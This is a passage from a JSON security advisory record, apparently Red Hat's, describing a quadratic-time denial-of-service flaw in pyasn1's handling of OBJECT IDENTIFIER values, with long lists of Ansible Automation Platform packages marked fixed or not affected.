"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-07-14T18:17:12.157807+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500380"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in pyasn1, a Python library for Abstract Syntax Notation One (ASN.1). The BER, CER, and DER decoders process OBJECT IDENTIFIER and RELATIVE-OID values in quadratic time relative to the number of arcs. A remote attacker could exploit this by providing a specially crafted payload containing an OID with many arcs, leading to excessive CPU consumption and a denial of service (DoS) in applications that decode untrusted ASN.1 data. The corresponding encoders also exhibit this quadratic behavior when re-encoding attacker-supplied values.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyasn1: python-pyasn1: pyasn1: Denial of Service via crafted ASN.1 OBJECT IDENTIFIER",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in pyasn1. The BER, CER, and DER decoders process OBJECT IDENTIFIER and RELATIVE-OID values in quadratic time relative to the number of arcs. A small crafted payload containing an OID with many arcs consumes excessive CPU per decode() call, allowing denial of service in applications that decode untrusted ASN.1 data (certificates, LDAP, SNMP, Kerberos). The corresponding encoders exhibit the same behavior when re-encoding attacker-supplied values. The arc-size limit introduced for CVE-2026-23490 does not mitigate this issue. This issue is fixed in pyasn1 version 0.6.4.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
